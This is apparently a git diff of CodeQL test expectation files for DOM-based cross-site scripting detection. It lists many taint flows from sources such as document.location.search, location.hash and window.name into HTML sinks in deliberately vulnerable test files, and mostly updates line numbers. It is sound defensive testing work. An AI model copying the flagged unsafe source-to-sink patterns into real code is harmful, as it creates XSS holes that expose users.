$@. | tst.js:248:11:248:21 | window.name | user-provided value | +| tst.js:264:22:264:29 | location | tst.js:264:22:264:29 | location | tst.js:264:22:264:29 | location | Cross-site scripting vulnerability due to $@. | tst.js:264:22:264:29 | location | user-provided value | +| tst.js:272:59:272:65 | tainted | tst.js:269:19:269:29 | window.name | tst.js:272:59:272:65 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:269:19:269:29 | window.name | user-provided value | +| tst.js:287:20:287:20 | e | tst.js:285:9:285:16 | location | tst.js:287:20:287:20 | e | Cross-site scripting vulnerability due to $@. | tst.js:285:9:285:16 | location | user-provided value | +| tst.js:295:20:295:20 | e | tst.js:292:10:292:17 | location | tst.js:295:20:295:20 | e | Cross-site scripting vulnerability due to $@. | tst.js:292:10:292:17 | location | user-provided value | +| tst.js:300:35:300:42 | location | tst.js:300:35:300:42 | location | tst.js:300:35:300:42 | location | Cross-site scripting vulnerability due to $@. | tst.js:300:35:300:42 | location | user-provided value | +| tst.js:316:18:316:35 | params.get('name') | tst.js:311:18:311:34 | document.location | tst.js:316:18:316:35 | params.get('name') | Cross-site scripting vulnerability due to $@. | tst.js:311:18:311:34 | document.location | user-provided value | +| tst.js:327:5:327:30 | getUrl( ... ring(1) | tst.js:325:20:325:36 | document.location | tst.js:327:5:327:30 | getUrl( ... ring(1) | Cross-site scripting vulnerability due to $@. | tst.js:325:20:325:36 | document.location | user-provided value | +| tst.js:333:12:333:17 | target | tst.js:332:16:332:39 | documen ... .search | tst.js:333:12:333:17 | target | Cross-site scripting vulnerability due to $@. | tst.js:332:16:332:39 | documen ... .search | user-provided value | +| tst.js:340:16:340:21 | target | tst.js:339:19:339:42 | documen ... .search | tst.js:340:16:340:21 | target | Cross-site scripting vulnerability due to $@. | tst.js:339:19:339:42 | documen ... .search | user-provided value | +| tst.js:344:21:344:26 | target | tst.js:339:19:339:42 | documen ... .search | tst.js:344:21:344:26 | target | Cross-site scripting vulnerability due to $@. | tst.js:339:19:339:42 | documen ... .search | user-provided value | +| tst.js:347:18:347:23 | target | tst.js:339:19:339:42 | documen ... .search | tst.js:347:18:347:23 | target | Cross-site scripting vulnerability due to $@. | tst.js:339:19:339:42 | documen ... .search | user-provided value | +| tst.js:357:18:357:23 | target | tst.js:355:16:355:39 | documen ... .search | tst.js:357:18:357:23 | target | Cross-site scripting vulnerability due to $@. | tst.js:355:16:355:39 | documen ... .search | user-provided value | +| tst.js:367:18:367:23 | target | tst.js:364:16:364:39 | documen ... .search | tst.js:367:18:367:23 | target | Cross-site scripting vulnerability due to $@. | tst.js:364:16:364:39 | documen ... .search | user-provided value | +| tst.js:369:18:369:29 | target.taint | tst.js:364:16:364:39 | documen ... .search | tst.js:369:18:369:29 | target.taint | Cross-site scripting vulnerability due to $@. | tst.js:364:16:364:39 | documen ... .search | user-provided value | +| tst.js:375:18:375:30 | target.taint3 | tst.js:374:19:374:42 | documen ... .search | tst.js:375:18:375:30 | target.taint3 | Cross-site scripting vulnerability due to $@. | tst.js:374:19:374:42 | documen ... .search | user-provided value | +| tst.js:380:18:380:30 | target.taint5 | tst.js:364:16:364:39 | documen ... .search | tst.js:380:18:380:30 | target.taint5 | Cross-site scripting vulnerability due to $@. | tst.js:364:16:364:39 | documen ... .search | user-provided value | +| tst.js:389:18:389:30 | target.taint7 | tst.js:364:16:364:39 | documen ... .search | tst.js:389:18:389:30 | target.taint7 | Cross-site scripting vulnerability due to $@. | tst.js:364:16:364:39 | documen ... .search | user-provided value | +| tst.js:392:18:392:30 | target.taint8 | tst.js:364:16:364:39 | documen ... .search | tst.js:392:18:392:30 | target.taint8 | Cross-site scripting vulnerability due to $@. | tst.js:364:16:364:39 | documen ... .search | user-provided value | +| tst.js:400:18:400:24 | payload | tst.js:399:17:399:36 | window.location.hash | tst.js:400:18:400:24 | payload | Cross-site scripting vulnerability due to $@. | tst.js:399:17:399:36 | window.location.hash | user-provided value | +| tst.js:404:20:404:27 | match[1] | tst.js:402:15:402:34 | window.location.hash | tst.js:404:20:404:27 | match[1] | Cross-site scripting vulnerability due to $@. | tst.js:402:15:402:34 | window.location.hash | user-provided value | +| tst.js:407:18:407:51 | window. ... '#')[1] | tst.js:407:18:407:37 | window.location.hash | tst.js:407:18:407:51 | window. ... '#')[1] | Cross-site scripting vulnerability due to $@. | tst.js:407:18:407:37 | window.location.hash | user-provided value | +| tst.js:413:18:413:89 | target. ... data>') | tst.js:411:16:411:39 | documen ... .search | tst.js:413:18:413:89 | target. ... data>') | Cross-site scripting vulnerability due to $@. | tst.js:411:16:411:39 | documen ... .search | user-provided value | +| tst.js:423:28:423:33 | source | tst.js:419:15:419:38 | documen ... .search | tst.js:423:28:423:33 | source | Cross-site scripting vulnerability due to $@. | tst.js:419:15:419:38 | documen ... .search | user-provided value | +| tst.js:424:33:424:38 | source | tst.js:419:15:419:38 | documen ... .search | tst.js:424:33:424:38 | source | Cross-site scripting vulnerability due to $@. | tst.js:419:15:419:38 | documen ... .search | user-provided value | +| tst.js:425:34:425:39 | source | tst.js:419:15:419:38 | documen ... .search | tst.js:425:34:425:39 | source | Cross-site scripting vulnerability due to $@. | tst.js:419:15:419:38 | documen ... .search | user-provided value | +| tst.js:426:41:426:46 | source | tst.js:419:15:419:38 | documen ... .search | tst.js:426:41:426:46 | source | Cross-site scripting vulnerability due to $@. | tst.js:419:15:419:38 | documen ... .search | user-provided value | +| tst.js:427:44:427:49 | source | tst.js:419:15:419:38 | documen ... .search | tst.js:427:44:427:49 | source | Cross-site scripting vulnerability due to $@. | tst.js:419:15:419:38 | documen ... .search | user-provided value | +| tst.js:428:32:428:37 | source | tst.js:419:15:419:38 | documen ... .search | tst.js:428:32:428:37 | source | Cross-site scripting vulnerability due to $@. | tst.js:419:15:419:38 | documen ... .search | user-provided value | +| tst.js:438:18:438:23 | source | tst.js:436:16:436:39 | documen ... .search | tst.js:438:18:438:23 | source | Cross-site scripting vulnerability due to $@. | tst.js:436:16:436:39 | documen ... .search | user-provided value | +| tst.js:439:18:439:42 | ansiToH ... source) | tst.js:436:16:436:39 | documen ... .search | tst.js:439:18:439:42 | ansiToH ... source) | Cross-site scripting vulnerability due to $@. | tst.js:436:16:436:39 | documen ... .search | user-provided value | +| tst.js:446:21:446:26 | source | tst.js:443:15:443:38 | documen ... .search | tst.js:446:21:446:26 | source | Cross-site scripting vulnerability due to $@. | tst.js:443:15:443:38 | documen ... .search | user-provided value | +| tst.js:448:19:448:24 | source | tst.js:443:15:443:38 | documen ... .search | tst.js:448:19:448:24 | source | Cross-site scripting vulnerability due to $@. | tst.js:443:15:443:38 | documen ... .search | user-provided value | +| tst.js:450:20:450:25 | source | tst.js:443:15:443:38 | documen ... .search | tst.js:450:20:450:25 | source | Cross-site scripting vulnerability due to $@. | tst.js:443:15:443:38 | documen ... .search | user-provided value | +| tst.js:456:19:456:21 | url | tst.js:454:13:454:36 | documen ... .search | tst.js:456:19:456:21 | url | Cross-site scripting vulnerability due to $@. | tst.js:454:13:454:36 | documen ... .search | user-provided value | +| tst.js:457:26:457:28 | url | tst.js:454:13:454:36 | documen ... .search | tst.js:457:26:457:28 | url | Cross-site scripting vulnerability due to $@. | tst.js:454:13:454:36 | documen ... .search | user-provided value | +| tst.js:458:25:458:27 | url | tst.js:454:13:454:36 | documen ... .search | tst.js:458:25:458:27 | url | Cross-site scripting vulnerability due to $@. | tst.js:454:13:454:36 | documen ... .search | user-provided value | +| tst.js:459:20:459:22 | url | tst.js:454:13:454:36 | documen ... .search | tst.js:459:20:459:22 | url | Cross-site scripting vulnerability due to $@. | tst.js:454:13:454:36 | documen ... .search | user-provided value | +| tst.js:469:22:469:24 | url | tst.js:454:13:454:36 | documen ... .search | tst.js:469:22:469:24 | url | Cross-site scripting vulnerability due to $@. | tst.js:454:13:454:36 | documen ... .search | user-provided value | +| tst.js:474:23:474:45 | locatio ... bstr(1) | tst.js:474:23:474:35 | location.hash | tst.js:474:23:474:45 | locatio ... bstr(1) | Cross-site scripting vulnerability due to $@. | tst.js:474:23:474:35 | location.hash | user-provided value | +| tst.js:477:18:477:40 | locatio ... bstr(1) | tst.js:477:18:477:30 | location.hash | tst.js:477:18:477:40 | locatio ... bstr(1) | Cross-site scripting vulnerability due to $@. | tst.js:477:18:477:30 | location.hash | user-provided value | +| tst.js:484:33:484:63 | decodeU ... n.hash) | tst.js:484:43:484:62 | window.location.hash | tst.js:484:33:484:63 | decodeU ... n.hash) | Cross-site scripting vulnerability due to $@. | tst.js:484:43:484:62 | window.location.hash | user-provided value | +| tst.js:492:18:492:54 | target. ... "), '') | tst.js:491:16:491:39 | documen ... .search | tst.js:492:18:492:54 | target. ... "), '') | Cross-site scripting vulnerability due to $@. | tst.js:491:16:491:39 | documen ... .search | user-provided value | | typeahead.js:25:18:25:20 | val | typeahead.js:20:22:20:45 | documen ... .search | typeahead.js:25:18:25:20 | val | Cross-site scripting vulnerability due to $@. | typeahead.js:20:22:20:45 | documen ... .search | user-provided value | | various-concat-obfuscations.js:4:4:4:31 | "
" ...
" | various-concat-obfuscations.js:2:16:2:39 | documen ... .search | various-concat-obfuscations.js:4:4:4:31 | "
" ...
" | Cross-site scripting vulnerability due to $@. | various-concat-obfuscations.js:2:16:2:39 | documen ... .search | user-provided value | | various-concat-obfuscations.js:5:4:5:26 | `
$ ...
` | various-concat-obfuscations.js:2:16:2:39 | documen ... .search | various-concat-obfuscations.js:5:4:5:26 | `
$ ...
` | Cross-site scripting vulnerability due to $@. | various-concat-obfuscations.js:2:16:2:39 | documen ... .search | user-provided value | diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/XssWithAdditionalSources.expected b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/XssWithAdditionalSources.expected index 8e4fdb09b996..a9bc4f7c3a0b 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/XssWithAdditionalSources.expected +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/XssWithAdditionalSources.expected @@ -152,7 +152,7 @@ nodes | dragAndDrop.ts:73:29:73:39 | droppedHtml | semmle.label | droppedHtml | | event-handler-receiver.js:2:31:2:83 | '

' | semmle.label | '

' | | event-handler-receiver.js:2:49:2:61 | location.href | semmle.label | location.href | -| express.js:7:15:7:33 | req.param("wobble") | semmle.label | req.param("wobble") | +| express.js:6:15:6:33 | req.param("wobble") | semmle.label | req.param("wobble") | | jquery.js:2:7:2:40 | tainted | semmle.label | tainted | | jquery.js:2:17:2:40 | documen ... .search | semmle.label | documen ... .search | | jquery.js:4:5:4:11 | tainted | semmle.label | tainted | @@ -202,8 +202,8 @@ nodes | jwt-server.js:7:17:7:35 | req.param("wobble") | semmle.label | req.param("wobble") | | jwt-server.js:9:16:9:20 | taint | semmle.label | taint | | jwt-server.js:9:55:9:61 | decoded | semmle.label | decoded | -| jwt-server.js:11:19:11:25 | decoded | semmle.label | decoded | -| jwt-server.js:11:19:11:29 | decoded.foo | semmle.label | decoded.foo | +| jwt-server.js:10:19:10:25 | decoded | semmle.label | decoded | +| jwt-server.js:10:19:10:29 | decoded.foo | semmle.label | decoded.foo | | jwt.js:4:36:4:39 | data | semmle.label | data | | jwt.js:5:9:5:34 | decoded | semmle.label | decoded | | jwt.js:5:19:5:34 | jwt_decode(data) | semmle.label | jwt_decode(data) | @@ -348,9 +348,9 @@ nodes | translate.js:7:42:7:60 | target.substring(1) | semmle.label | target.substring(1) | | translate.js:7:42:7:60 | target.substring(1) | semmle.label | target.substring(1) | | translate.js:7:42:7:60 | target.substring(1) | semmle.label | target.substring(1) | -| translate.js:9:27:9:38 | searchParams | semmle.label | searchParams | -| translate.js:9:27:9:38 | searchParams [MapValue] | semmle.label | searchParams [MapValue] | -| translate.js:9:27:9:50 | searchP ... 'term') | semmle.label | searchP ... 'term') | +| translate.js:8:27:8:38 | searchParams | semmle.label | searchParams | +| translate.js:8:27:8:38 | searchParams [MapValue] | semmle.label | searchParams [MapValue] | +| translate.js:8:27:8:50 | searchP ... 'term') | semmle.label | searchP ... 'term') | | trusted-types-lib.js:1:28:1:28 | x | semmle.label | x | | trusted-types-lib.js:2:12:2:12 | x | semmle.label | x | | trusted-types.js:3:62:3:62 | x | semmle.label | x | @@ -373,240 +373,240 @@ nodes | tst3.js:10:38:10:43 | data.p | semmle.label | data.p | | tst.js:2:7:2:39 | target | semmle.label | target | | tst.js:2:16:2:39 | documen ... .search | semmle.label | documen ... .search | -| tst.js:5:18:5:23 | target | semmle.label | target | -| tst.js:8:18:8:126 | "" | semmle.label | "" | -| tst.js:8:37:8:58 | documen ... on.href | semmle.label | documen ... on.href | -| tst.js:8:37:8:114 | documen ... t=")+8) | semmle.label | documen ... t=")+8) | -| tst.js:8:37:8:114 | documen ... t=")+8) | semmle.label | documen ... t=")+8) | -| tst.js:12:5:12:42 | '
' | semmle.label | '
' | -| tst.js:12:28:12:33 | target | semmle.label | target | -| tst.js:17:7:17:56 | params | semmle.label | params | -| tst.js:17:7:17:56 | params [MapValue] | semmle.label | params [MapValue] | -| tst.js:17:16:17:43 | (new UR ... ation)) [searchParams, MapValue] | semmle.label | (new UR ... ation)) [searchParams, MapValue] | -| tst.js:17:16:17:43 | (new UR ... ation)) [searchParams] | semmle.label | (new UR ... ation)) [searchParams] | -| tst.js:17:16:17:56 | (new UR ... hParams | semmle.label | (new UR ... hParams | -| tst.js:17:16:17:56 | (new UR ... hParams [MapValue] | semmle.label | (new UR ... hParams [MapValue] | -| tst.js:17:17:17:42 | new URL ... cation) [searchParams, MapValue] | semmle.label | new URL ... cation) [searchParams, MapValue] | -| tst.js:17:17:17:42 | new URL ... cation) [searchParams] | semmle.label | new URL ... cation) [searchParams] | -| tst.js:17:25:17:41 | document.location | semmle.label | document.location | -| tst.js:18:18:18:23 | params | semmle.label | params | -| tst.js:18:18:18:23 | params [MapValue] | semmle.label | params [MapValue] | -| tst.js:18:18:18:35 | params.get('name') | semmle.label | params.get('name') | -| tst.js:20:7:20:61 | searchParams | semmle.label | searchParams | -| tst.js:20:7:20:61 | searchParams [MapValue] | semmle.label | searchParams [MapValue] | -| tst.js:20:22:20:61 | new URL ... ing(1)) | semmle.label | new URL ... ing(1)) | -| tst.js:20:22:20:61 | new URL ... ing(1)) [MapValue] | semmle.label | new URL ... ing(1)) [MapValue] | -| tst.js:20:42:20:47 | target | semmle.label | target | -| tst.js:20:42:20:60 | target.substring(1) | semmle.label | target.substring(1) | -| tst.js:20:42:20:60 | target.substring(1) | semmle.label | target.substring(1) | -| tst.js:20:42:20:60 | target.substring(1) | semmle.label | target.substring(1) | -| tst.js:21:18:21:29 | searchParams | semmle.label | searchParams | -| tst.js:21:18:21:29 | searchParams [MapValue] | semmle.label | searchParams [MapValue] | -| tst.js:21:18:21:41 | searchP ... 'name') | semmle.label | searchP ... 'name') | -| tst.js:24:14:24:19 | target | semmle.label | target | -| tst.js:26:18:26:23 | target | semmle.label | target | -| tst.js:28:5:28:28 | documen ... .search | semmle.label | documen ... .search | -| tst.js:31:10:31:33 | documen ... .search | semmle.label | documen ... .search | -| tst.js:34:16:34:20 | bar() | semmle.label | bar() | -| tst.js:36:14:36:14 | x | semmle.label | x | -| tst.js:37:10:37:10 | x | semmle.label | x | -| tst.js:40:16:40:44 | baz(doc ... search) | semmle.label | baz(doc ... search) | -| tst.js:40:20:40:43 | documen ... .search | semmle.label | documen ... .search | -| tst.js:42:15:42:15 | s | semmle.label | s | -| tst.js:42:15:42:15 | s | semmle.label | s | -| tst.js:43:10:43:31 | "
" ...
" | semmle.label | "
" ...
" | -| tst.js:43:20:43:20 | s | semmle.label | s | -| tst.js:43:20:43:20 | s | semmle.label | s | -| tst.js:46:16:46:45 | wrap(do ... search) | semmle.label | wrap(do ... search) | +| tst.js:4:18:4:23 | target | semmle.label | target | +| tst.js:6:18:6:126 | "" | semmle.label | "" | +| tst.js:6:37:6:58 | documen ... on.href | semmle.label | documen ... on.href | +| tst.js:6:37:6:114 | documen ... t=")+8) | semmle.label | documen ... t=")+8) | +| tst.js:6:37:6:114 | documen ... t=")+8) | semmle.label | documen ... t=")+8) | +| tst.js:9:5:9:42 | '
' | semmle.label | '
' | +| tst.js:9:28:9:33 | target | semmle.label | target | +| tst.js:14:7:14:56 | params | semmle.label | params | +| tst.js:14:7:14:56 | params [MapValue] | semmle.label | params [MapValue] | +| tst.js:14:16:14:43 | (new UR ... ation)) [searchParams, MapValue] | semmle.label | (new UR ... ation)) [searchParams, MapValue] | +| tst.js:14:16:14:43 | (new UR ... ation)) [searchParams] | semmle.label | (new UR ... ation)) [searchParams] | +| tst.js:14:16:14:56 | (new UR ... hParams | semmle.label | (new UR ... hParams | +| tst.js:14:16:14:56 | (new UR ... hParams [MapValue] | semmle.label | (new UR ... hParams [MapValue] | +| tst.js:14:17:14:42 | new URL ... cation) [searchParams, MapValue] | semmle.label | new URL ... cation) [searchParams, MapValue] | +| tst.js:14:17:14:42 | new URL ... cation) [searchParams] | semmle.label | new URL ... cation) [searchParams] | +| tst.js:14:25:14:41 | document.location | semmle.label | document.location | +| tst.js:15:18:15:23 | params | semmle.label | params | +| tst.js:15:18:15:23 | params [MapValue] | semmle.label | params [MapValue] | +| tst.js:15:18:15:35 | params.get('name') | semmle.label | params.get('name') | +| tst.js:17:7:17:61 | searchParams | semmle.label | searchParams | +| tst.js:17:7:17:61 | searchParams [MapValue] | semmle.label | searchParams [MapValue] | +| tst.js:17:22:17:61 | new URL ... ing(1)) | semmle.label | new URL ... ing(1)) | +| tst.js:17:22:17:61 | new URL ... ing(1)) [MapValue] | semmle.label | new URL ... ing(1)) [MapValue] | +| tst.js:17:42:17:47 | target | semmle.label | target | +| tst.js:17:42:17:60 | target.substring(1) | semmle.label | target.substring(1) | +| tst.js:17:42:17:60 | target.substring(1) | semmle.label | target.substring(1) | +| tst.js:17:42:17:60 | target.substring(1) | semmle.label | target.substring(1) | +| tst.js:18:18:18:29 | searchParams | semmle.label | searchParams | +| tst.js:18:18:18:29 | searchParams [MapValue] | semmle.label | searchParams [MapValue] | +| tst.js:18:18:18:41 | searchP ... 'name') | semmle.label | searchP ... 'name') | +| tst.js:21:14:21:19 | target | semmle.label | target | +| tst.js:22:18:22:23 | target | semmle.label | target | +| tst.js:24:5:24:28 | documen ... .search | semmle.label | documen ... .search | +| tst.js:27:10:27:33 | documen ... .search | semmle.label | documen ... .search | +| tst.js:29:16:29:20 | bar() | semmle.label | bar() | +| tst.js:31:14:31:14 | x | semmle.label | x | +| tst.js:32:10:32:10 | x | semmle.label | x | +| tst.js:34:16:34:44 | baz(doc ... search) | semmle.label | baz(doc ... search) | +| tst.js:34:20:34:43 | documen ... .search | semmle.label | documen ... .search | +| tst.js:36:15:36:15 | s | semmle.label | s | +| tst.js:36:15:36:15 | s | semmle.label | s | +| tst.js:37:10:37:31 | "
" ...
" | semmle.label | "
" ...
" | +| tst.js:37:20:37:20 | s | semmle.label | s | +| tst.js:37:20:37:20 | s | semmle.label | s | +| tst.js:39:16:39:45 | wrap(do ... search) | semmle.label | wrap(do ... search) | +| tst.js:39:21:39:44 | documen ... .search | semmle.label | documen ... .search | +| tst.js:41:15:41:15 | s | semmle.label | s | +| tst.js:43:12:43:12 | s | semmle.label | s | +| tst.js:43:12:43:22 | s.substr(1) | semmle.label | s.substr(1) | +| tst.js:43:12:43:22 | s.substr(1) | semmle.label | s.substr(1) | +| tst.js:43:12:43:22 | s.substr(1) | semmle.label | s.substr(1) | +| tst.js:46:16:46:45 | chop(do ... search) | semmle.label | chop(do ... search) | | tst.js:46:21:46:44 | documen ... .search | semmle.label | documen ... .search | -| tst.js:48:15:48:15 | s | semmle.label | s | -| tst.js:50:12:50:12 | s | semmle.label | s | -| tst.js:50:12:50:22 | s.substr(1) | semmle.label | s.substr(1) | -| tst.js:50:12:50:22 | s.substr(1) | semmle.label | s.substr(1) | -| tst.js:50:12:50:22 | s.substr(1) | semmle.label | s.substr(1) | -| tst.js:54:16:54:45 | chop(do ... search) | semmle.label | chop(do ... search) | -| tst.js:54:21:54:44 | documen ... .search | semmle.label | documen ... .search | -| tst.js:56:16:56:45 | chop(do ... search) | semmle.label | chop(do ... search) | -| tst.js:56:21:56:44 | documen ... .search | semmle.label | documen ... .search | -| tst.js:58:16:58:32 | wrap(chop(bar())) | semmle.label | wrap(chop(bar())) | -| tst.js:58:21:58:31 | chop(bar()) | semmle.label | chop(bar()) | -| tst.js:58:21:58:31 | chop(bar()) | semmle.label | chop(bar()) | -| tst.js:58:26:58:30 | bar() | semmle.label | bar() | -| tst.js:60:34:60:34 | s | semmle.label | s | -| tst.js:62:18:62:18 | s | semmle.label | s | -| tst.js:64:25:64:48 | documen ... .search | semmle.label | documen ... .search | -| tst.js:65:25:65:48 | documen ... .search | semmle.label | documen ... .search | -| tst.js:68:16:68:20 | bar() | semmle.label | bar() | -| tst.js:70:1:70:27 | [,docum ... search] [1] | semmle.label | [,docum ... search] [1] | -| tst.js:70:3:70:26 | documen ... .search | semmle.label | documen ... .search | -| tst.js:70:46:70:46 | x | semmle.label | x | -| tst.js:73:20:73:20 | x | semmle.label | x | -| tst.js:77:49:77:72 | documen ... .search | semmle.label | documen ... .search | -| tst.js:81:26:81:49 | documen ... .search | semmle.label | documen ... .search | -| tst.js:82:25:82:48 | documen ... .search | semmle.label | documen ... .search | -| tst.js:84:33:84:56 | documen ... .search | semmle.label | documen ... .search | -| tst.js:85:32:85:55 | documen ... .search | semmle.label | documen ... .search | -| tst.js:90:39:90:62 | documen ... .search | semmle.label | documen ... .search | -| tst.js:96:30:96:53 | documen ... .search | semmle.label | documen ... .search | -| tst.js:102:25:102:48 | documen ... .search | semmle.label | documen ... .search | -| tst.js:107:7:107:44 | v | semmle.label | v | -| tst.js:107:11:107:34 | documen ... .search | semmle.label | documen ... .search | -| tst.js:107:11:107:44 | documen ... bstr(1) | semmle.label | documen ... bstr(1) | -| tst.js:110:18:110:18 | v | semmle.label | v | -| tst.js:136:18:136:18 | v | semmle.label | v | -| tst.js:148:29:148:50 | window. ... .search | semmle.label | window. ... .search | -| tst.js:151:29:151:29 | v | semmle.label | v | -| tst.js:151:49:151:49 | v | semmle.label | v | -| tst.js:155:29:155:46 | xssSourceService() | semmle.label | xssSourceService() | -| tst.js:158:40:158:61 | window. ... .search | semmle.label | window. ... .search | -| tst.js:177:9:177:41 | target | semmle.label | target | -| tst.js:177:18:177:41 | documen ... .search | semmle.label | documen ... .search | -| tst.js:180:28:180:33 | target | semmle.label | target | -| tst.js:184:9:184:42 | tainted | semmle.label | tainted | -| tst.js:184:19:184:42 | documen ... .search | semmle.label | documen ... .search | -| tst.js:186:31:186:37 | tainted | semmle.label | tainted | -| tst.js:188:42:188:48 | tainted | semmle.label | tainted | -| tst.js:189:33:189:39 | tainted | semmle.label | tainted | -| tst.js:191:54:191:60 | tainted | semmle.label | tainted | -| tst.js:192:45:192:51 | tainted | semmle.label | tainted | -| tst.js:193:49:193:55 | tainted | semmle.label | tainted | -| tst.js:197:9:197:42 | tainted | semmle.label | tainted | -| tst.js:197:19:197:42 | documen ... .search | semmle.label | documen ... .search | -| tst.js:199:67:199:73 | tainted | semmle.label | tainted | -| tst.js:200:67:200:73 | tainted | semmle.label | tainted | -| tst.js:204:35:204:41 | tainted | semmle.label | tainted | -| tst.js:206:46:206:52 | tainted | semmle.label | tainted | -| tst.js:207:38:207:44 | tainted | semmle.label | tainted | -| tst.js:208:35:208:41 | tainted | semmle.label | tainted | -| tst.js:212:28:212:46 | this.state.tainted1 | semmle.label | this.state.tainted1 | -| tst.js:213:28:213:46 | this.state.tainted2 | semmle.label | this.state.tainted2 | -| tst.js:214:28:214:46 | this.state.tainted3 | semmle.label | this.state.tainted3 | -| tst.js:218:32:218:49 | prevState.tainted4 | semmle.label | prevState.tainted4 | -| tst.js:225:28:225:46 | this.props.tainted1 | semmle.label | this.props.tainted1 | -| tst.js:226:28:226:46 | this.props.tainted2 | semmle.label | this.props.tainted2 | -| tst.js:227:28:227:46 | this.props.tainted3 | semmle.label | this.props.tainted3 | -| tst.js:231:32:231:49 | prevProps.tainted4 | semmle.label | prevProps.tainted4 | -| tst.js:236:35:236:41 | tainted | semmle.label | tainted | -| tst.js:238:20:238:26 | tainted | semmle.label | tainted | -| tst.js:240:23:240:29 | tainted | semmle.label | tainted | -| tst.js:241:23:241:29 | tainted | semmle.label | tainted | -| tst.js:247:39:247:55 | props.propTainted | semmle.label | props.propTainted | -| tst.js:251:60:251:82 | this.st ... Tainted | semmle.label | this.st ... Tainted | -| tst.js:255:23:255:29 | tainted | semmle.label | tainted | -| tst.js:259:7:259:17 | window.name | semmle.label | window.name | -| tst.js:260:7:260:10 | name | semmle.label | name | -| tst.js:264:11:264:21 | window.name | semmle.label | window.name | -| tst.js:280:22:280:29 | location | semmle.label | location | -| tst.js:285:9:285:29 | tainted | semmle.label | tainted | -| tst.js:285:19:285:29 | window.name | semmle.label | window.name | -| tst.js:288:59:288:65 | tainted | semmle.label | tainted | -| tst.js:301:9:301:16 | location | semmle.label | location | -| tst.js:302:10:302:10 | e | semmle.label | e | -| tst.js:303:20:303:20 | e | semmle.label | e | -| tst.js:308:10:308:17 | location | semmle.label | location | -| tst.js:310:10:310:10 | e | semmle.label | e | -| tst.js:311:20:311:20 | e | semmle.label | e | -| tst.js:316:35:316:42 | location | semmle.label | location | -| tst.js:327:10:327:35 | new URL ... cation) [searchParams, MapValue] | semmle.label | new URL ... cation) [searchParams, MapValue] | -| tst.js:327:10:327:35 | new URL ... cation) [searchParams] | semmle.label | new URL ... cation) [searchParams] | -| tst.js:327:18:327:34 | document.location | semmle.label | document.location | -| tst.js:331:7:331:43 | params | semmle.label | params | -| tst.js:331:7:331:43 | params [MapValue] | semmle.label | params [MapValue] | -| tst.js:331:16:331:30 | getTaintedUrl() [searchParams, MapValue] | semmle.label | getTaintedUrl() [searchParams, MapValue] | -| tst.js:331:16:331:30 | getTaintedUrl() [searchParams] | semmle.label | getTaintedUrl() [searchParams] | -| tst.js:331:16:331:43 | getTain ... hParams | semmle.label | getTain ... hParams | -| tst.js:331:16:331:43 | getTain ... hParams [MapValue] | semmle.label | getTain ... hParams [MapValue] | -| tst.js:332:18:332:23 | params | semmle.label | params | -| tst.js:332:18:332:23 | params [MapValue] | semmle.label | params [MapValue] | -| tst.js:332:18:332:35 | params.get('name') | semmle.label | params.get('name') | -| tst.js:341:12:341:37 | new URL ... cation) [hash] | semmle.label | new URL ... cation) [hash] | -| tst.js:341:20:341:36 | document.location | semmle.label | document.location | -| tst.js:343:5:343:12 | getUrl() [hash] | semmle.label | getUrl() [hash] | -| tst.js:343:5:343:17 | getUrl().hash | semmle.label | getUrl().hash | -| tst.js:343:5:343:30 | getUrl( ... ring(1) | semmle.label | getUrl( ... ring(1) | -| tst.js:348:7:348:39 | target | semmle.label | target | -| tst.js:348:16:348:39 | documen ... .search | semmle.label | documen ... .search | -| tst.js:349:12:349:17 | target | semmle.label | target | -| tst.js:355:10:355:42 | target | semmle.label | target | -| tst.js:355:19:355:42 | documen ... .search | semmle.label | documen ... .search | -| tst.js:356:16:356:21 | target | semmle.label | target | -| tst.js:357:20:357:25 | target | semmle.label | target | -| tst.js:360:21:360:26 | target | semmle.label | target | -| tst.js:363:18:363:23 | target | semmle.label | target | -| tst.js:371:7:371:39 | target | semmle.label | target | -| tst.js:371:16:371:39 | documen ... .search | semmle.label | documen ... .search | -| tst.js:374:18:374:23 | target | semmle.label | target | -| tst.js:381:7:381:39 | target | semmle.label | target | -| tst.js:381:16:381:39 | documen ... .search | semmle.label | documen ... .search | -| tst.js:384:18:384:23 | target | semmle.label | target | -| tst.js:386:18:386:23 | target | semmle.label | target | -| tst.js:386:18:386:29 | target.taint | semmle.label | target.taint | -| tst.js:391:3:391:8 | [post update] target [taint3] | semmle.label | [post update] target [taint3] | -| tst.js:391:19:391:42 | documen ... .search | semmle.label | documen ... .search | -| tst.js:392:18:392:23 | target [taint3] | semmle.label | target [taint3] | -| tst.js:392:18:392:30 | target.taint3 | semmle.label | target.taint3 | -| tst.js:397:18:397:23 | target | semmle.label | target | -| tst.js:397:18:397:30 | target.taint5 | semmle.label | target.taint5 | -| tst.js:406:18:406:23 | target | semmle.label | target | -| tst.js:406:18:406:30 | target.taint7 | semmle.label | target.taint7 | -| tst.js:408:3:408:8 | [post update] target [taint8] | semmle.label | [post update] target [taint8] | -| tst.js:408:19:408:24 | target | semmle.label | target | -| tst.js:408:19:408:24 | target [taint8] | semmle.label | target [taint8] | -| tst.js:408:19:408:31 | target.taint8 | semmle.label | target.taint8 | -| tst.js:409:18:409:23 | target [taint8] | semmle.label | target [taint8] | -| tst.js:409:18:409:30 | target.taint8 | semmle.label | target.taint8 | -| tst.js:416:7:416:46 | payload | semmle.label | payload | -| tst.js:416:17:416:36 | window.location.hash | semmle.label | window.location.hash | -| tst.js:416:17:416:46 | window. ... bstr(1) | semmle.label | window. ... bstr(1) | -| tst.js:417:18:417:24 | payload | semmle.label | payload | -| tst.js:419:7:419:55 | match | semmle.label | match | -| tst.js:419:15:419:34 | window.location.hash | semmle.label | window.location.hash | -| tst.js:419:15:419:55 | window. ... (\\w+)/) | semmle.label | window. ... (\\w+)/) | -| tst.js:421:20:421:24 | match | semmle.label | match | -| tst.js:421:20:421:27 | match[1] | semmle.label | match[1] | -| tst.js:424:18:424:37 | window.location.hash | semmle.label | window.location.hash | -| tst.js:424:18:424:48 | window. ... it('#') [1] | semmle.label | window. ... it('#') [1] | -| tst.js:424:18:424:51 | window. ... '#')[1] | semmle.label | window. ... '#')[1] | -| tst.js:428:7:428:39 | target | semmle.label | target | -| tst.js:428:16:428:39 | documen ... .search | semmle.label | documen ... .search | -| tst.js:430:18:430:23 | target | semmle.label | 